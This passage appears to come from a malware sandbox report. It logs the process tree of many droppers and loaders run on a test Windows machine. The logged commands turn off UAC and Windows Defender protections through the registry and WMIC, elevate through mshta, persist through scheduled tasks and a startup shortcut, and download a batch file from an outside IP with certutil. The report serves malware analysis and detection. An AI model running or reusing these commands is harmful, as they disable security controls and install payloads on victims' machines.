    - Creates scheduled task(s)
    PID:7680
- C:\Users\Admin\Desktop\a\av_downloader.exe
  "C:\Users\Admin\Desktop\a\av_downloader.exe"
  2⤵
  PID:4880
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7971.tmp\7972.tmp\7973.bat C:\Users\Admin\Desktop\a\av_downloader.exe"
    3⤵
    PID:1600
  - - C:\Windows\system32\mshta.exe
      mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\a\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
      4⤵
      PID:4228
    - - C:\Users\Admin\Desktop\a\AV_DOW~1.EXE
        
        "C:\Users\Admin\Desktop\a\AV_DOW~1.EXE" goto :target
        5⤵
        
        PID:4440
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7CBD.tmp\7CBE.tmp\7CBF.bat C:\Users\Admin\Desktop\a\AV_DOW~1.EXE goto :target"
        6⤵
        
        PID:4240
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        7⤵
        
        PID:1968
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        7⤵
        
        PID:4316
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        7⤵
        
        PID:4908
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h e:\net
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:516
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat
        7⤵
        
        PID:4828
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache * delete
        7⤵
        
        PID:2820
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f
        7⤵
        Creates scheduled task(s)
        
        PID:2344
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 100
        7⤵
        Delays execution with timeout.exe
        
        PID:1992
- C:\Users\Admin\Desktop\a\setup.exe
  "C:\Users\Admin\Desktop\a\setup.exe"
  2⤵
  PID:4248
- - C:\Users\Admin\AppData\Local\Temp\7zS916D.tmp\Install.exe
    .\Install.exe /tEdidDDf "385118" /S
    3⤵
    PID:360
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:4828
    - - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        5⤵
        
        PID:4672
      - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:4716
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:5932
    - - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        5⤵
        
        PID:6208
      - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:7984
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:6912
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
      4⤵
      PID:2844
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        5⤵
        
        PID:5304
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5900
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS916D.tmp\Install.exe\" it /lyxdidJiWE 385118 /S" /V1 /F
      4⤵
      Creates scheduled task(s)
      PID:5160
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
      4⤵
      PID:5200
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        5⤵
        
        PID:2188
      - \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:6796
- C:\Users\Admin\Desktop\a\file300un.exe
  "C:\Users\Admin\Desktop\a\file300un.exe"
  2⤵
  PID:4120
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
    3⤵
    PID:4884
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    PID:2776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:5192
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:5428
  - - C:\Users\Admin\Pictures\nQSm4YhDB7XKzvUeCGxrpO4h.exe
      "C:\Users\Admin\Pictures\nQSm4YhDB7XKzvUeCGxrpO4h.exe"
      4⤵
      PID:1544
  - - C:\Users\Admin\Pictures\wuHW2psgXsSitkOnHkPdRWMe.exe
      "C:\Users\Admin\Pictures\wuHW2psgXsSitkOnHkPdRWMe.exe"
      4⤵
      PID:4400
    - - C:\Users\Admin\AppData\Local\Temp\7zSE10.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        5⤵
        
        PID:5252
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        
        PID:7872
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:1492
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:6388
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:4112
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSE10.tmp\Install.exe\" it /PqvdidUWSv 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:6292
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        6⤵
        
        PID:6332
  - - C:\Users\Admin\Pictures\9Ihq0IR9nhGeNa2UvIOrX4PH.exe
      "C:\Users\Admin\Pictures\9Ihq0IR9nhGeNa2UvIOrX4PH.exe"
      4⤵
      PID:5328
  - - C:\Users\Admin\Pictures\iyVs05aZ6vA7vTHPeWWNjUdP.exe
      "C:\Users\Admin\Pictures\iyVs05aZ6vA7vTHPeWWNjUdP.exe"
      4⤵
      PID:1096
  - - C:\Users\Admin\Pictures\zFSLJWt9cux55Fqw3BtJUVTo.exe
      "C:\Users\Admin\Pictures\zFSLJWt9cux55Fqw3BtJUVTo.exe"
      4⤵
      PID:4508
  - - C:\Users\Admin\Pictures\IYNCCSK6EASXGzRhBHEKjiCe.exe
      "C:\Users\Admin\Pictures\IYNCCSK6EASXGzRhBHEKjiCe.exe"
      4⤵
      PID:5372
  - - C:\Users\Admin\Pictures\6CPH8ISjyXaDFJSiE4fgeHlW.exe
      "C:\Users\Admin\Pictures\6CPH8ISjyXaDFJSiE4fgeHlW.exe"
      4⤵
      PID:4904
  - - C:\Users\Admin\Pictures\SRG23hNeqEv0Ds2WvGJpoO97.exe
      "C:\Users\Admin\Pictures\SRG23hNeqEv0Ds2WvGJpoO97.exe"
      4⤵
      PID:7156
    - - C:\Users\Admin\AppData\Local\Temp\7zS335B.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        5⤵
        
        PID:5296
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:7260
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        
        PID:6884
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:7624
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:7172
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS335B.tmp\Install.exe\" it /IEMdidEDct 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:5144
- C:\Users\Admin\Desktop\a\Isetup2.exe
  "C:\Users\Admin\Desktop\a\Isetup2.exe"
  2⤵
  PID:3340
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    PID:5808
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    PID:6008
  - - C:\Users\Admin\Pictures\r0UyKyFbjlPls9ESw9RPTSJ3.exe
      "C:\Users\Admin\Pictures\r0UyKyFbjlPls9ESw9RPTSJ3.exe"
      4⤵
      PID:5480
  - - C:\Users\Admin\Pictures\7qyZNc8vIRzaPGAsU3PlDOA6.exe
      "C:\Users\Admin\Pictures\7qyZNc8vIRzaPGAsU3PlDOA6.exe"
      4⤵
      PID:6616
    - - C:\Users\Admin\AppData\Local\Temp\7zS31F3.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        5⤵
        
        PID:6872
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:6972
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        
        PID:5800
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:5660
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS31F3.tmp\Install.exe\" it /uxddidDPau 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:7196
  - - C:\Users\Admin\Pictures\nwEfPtCr2TYh1g8s7TcK3RcL.exe
      "C:\Users\Admin\Pictures\nwEfPtCr2TYh1g8s7TcK3RcL.exe"
      4⤵
      PID:6596
  - - C:\Users\Admin\Pictures\0fV5LvNe3IHgVU8uJ6WnisqT.exe
      "C:\Users\Admin\Pictures\0fV5LvNe3IHgVU8uJ6WnisqT.exe"
      4⤵
      PID:6588
  - - C:\Users\Admin\Pictures\wx7w2h44ch55HxOnRvDHNlQY.exe
      "C:\Users\Admin\Pictures\wx7w2h44ch55HxOnRvDHNlQY.exe"
      4⤵
      PID:6568
  - - C:\Users\Admin\Pictures\fv9YdgCpszoOfy3deTjCwGyn.exe
      "C:\Users\Admin\Pictures\fv9YdgCpszoOfy3deTjCwGyn.exe"
      4⤵
      PID:6920
  - - C:\Users\Admin\Pictures\ljgaoLxFGbRkO6FqDtTHBkK1.exe
      "C:\Users\Admin\Pictures\ljgaoLxFGbRkO6FqDtTHBkK1.exe"
      4⤵
      PID:7808
    - - C:\Users\Admin\AppData\Local\Temp\7zS910B.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        5⤵
        
        PID:1600
- C:\Users\Admin\Desktop\a\update.exe
  "C:\Users\Admin\Desktop\a\update.exe"
  2⤵
  PID:3472
- C:\Users\Admin\Desktop\a\nom.exe
  "C:\Users\Admin\Desktop\a\nom.exe"
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
    3⤵
    PID:1120
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\microsoftEdge\Edgeupdater.exe"
      4⤵
      PID:5580
    - - C:\ProgramData\microsoftEdge\Edgeupdater.exe
        
        C:\ProgramData\microsoftEdge\Edgeupdater.exe
        5⤵
        
        PID:6768
- C:\Users\Admin\Desktop\a\nomal1.exe
  "C:\Users\Admin\Desktop\a\nomal1.exe"
  2⤵
  PID:5368
- C:\Users\Admin\Desktop\a\080.exe
  "C:\Users\Admin\Desktop\a\080.exe"
  2⤵
  PID:5456
- - C:\Users\Admin\AppData\Local\Temp\is-GVL13.tmp\080.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-GVL13.tmp\080.tmp" /SL5="$1056A,3898914,54272,C:\Users\Admin\Desktop\a\080.exe"
    3⤵
    PID:6140
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -i
      4⤵
      PID:1272
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -s
      4⤵
      PID:2876
- C:\Users\Admin\Desktop\a\070.exe
  "C:\Users\Admin\Desktop\a\070.exe"
  2⤵
  PID:5724
- - C:\Users\Admin\AppData\Local\Temp\is-9EQFD.tmp\is-9LNRH.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-9EQFD.tmp\is-9LNRH.tmp" /SL4 $10582 "C:\Users\Admin\Desktop\a\070.exe" 4421495 52224
    3⤵
    PID:5272
  - - C:\Users\Admin\AppData\Local\Media Player Codec Pack\mplayercodecpack.exe
      "C:\Users\Admin\AppData\Local\Media Player Codec Pack\mplayercodecpack.exe" -i
      4⤵
      PID:5828
  - - C:\Users\Admin\AppData\Local\Media Player Codec Pack\mplayercodecpack.exe
      "C:\Users\Admin\AppData\Local\Media Player Codec Pack\mplayercodecpack.exe" -s
      4⤵
      PID:6428
- C:\Users\Admin\Desktop\a\12345.exe
  "C:\Users\Admin\Desktop\a\12345.exe"
  2⤵
  PID:2584
- C:\Users\Admin\Desktop\a\test.exe
  "C:\Users\Admin\Desktop\a\test.exe"
  2⤵
  PID:6132
- C:\Users\Admin\Desktop\a\system32.exe
  "C:\Users\Admin\Desktop\a\system32.exe"
  2⤵
  PID:2816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File psps.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:704
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\widaaxrv\widaaxrv.cmdline"
      4⤵
      PID:7148
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BCB.tmp" "c:\Users\Admin\AppData\Local\Temp\widaaxrv\CSC2095DB0EFA2D41FC856A74D843839B23.TMP"
        5⤵
        
        PID:7824
- C:\Users\Admin\Desktop\a\wfopkrgoplq.exe
  "C:\Users\Admin\Desktop\a\wfopkrgoplq.exe"
  2⤵
  PID:5164
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\Desktop\a\wfopkrgoplq.exe"
    3⤵
    PID:6268
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 660
    3⤵
    - Program crash
    PID:6704
- C:\Users\Admin\Desktop\a\htm.exe
  "C:\Users\Admin\Desktop\a\htm.exe"
  2⤵
  PID:5264
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5504
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ehvzcjlrfrthprztxjgd"
      4⤵
      PID:8184
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ojakcbwltzlmzxnxgutfvtg"
      4⤵
      PID:2736
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rdfdduhmhhdzclbbxfngggbajqa"
      4⤵
      PID:8120
- C:\Users\Admin\Desktop\a\up2date.exe
  "C:\Users\Admin\Desktop\a\up2date.exe"
  2⤵
  PID:5548
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5736
- C:\Users\Admin\Desktop\a\setup_1715277229.6072824.exe
  "C:\Users\Admin\Desktop\a\setup_1715277229.6072824.exe"
  2⤵
  PID:6448
- C:\Users\Admin\Desktop\a\pojgysef.exe
  "C:\Users\Admin\Desktop\a\pojgysef.exe"
  2⤵
  PID:7092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
    3⤵
    PID:6932
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
      work.exe -priverdD
      4⤵
      PID:8152
- C:\Users\Admin\Desktop\a\udated.exe
  "C:\Users\Admin\Desktop\a\udated.exe"
  2⤵
  PID:6912
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7620
- C:\Users\Admin\Desktop\a\build.exe
  "C:\Users\Admin\Desktop\a\build.exe"
  2⤵
  PID:6508
- C:\Users\Admin\Desktop\a\current.exe
  "C:\Users\Admin\Desktop\a\current.exe"
  2⤵
  PID:4728
- C:\Users\Admin\Desktop\a\eee01.exe
  "C:\Users\Admin\Desktop\a\eee01.exe"
  2⤵
  PID:7696

C:\Windows\lqvjqa.exe
C:\Windows\lqvjqa.exe
1⤵
PID:4116

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCoderR.url" & echo URL="C:\Users\Admin\AppData\Local\CodeInnovate Technologies Co\InnoCoderR.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCoderR.url" & exit
1⤵
PID:812

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7116

C:\Users\Admin\AppData\Local\Temp\7zS916D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS916D.tmp\Install.exe it /lyxdidJiWE 385118 /S
1⤵
PID:7312
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6364
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 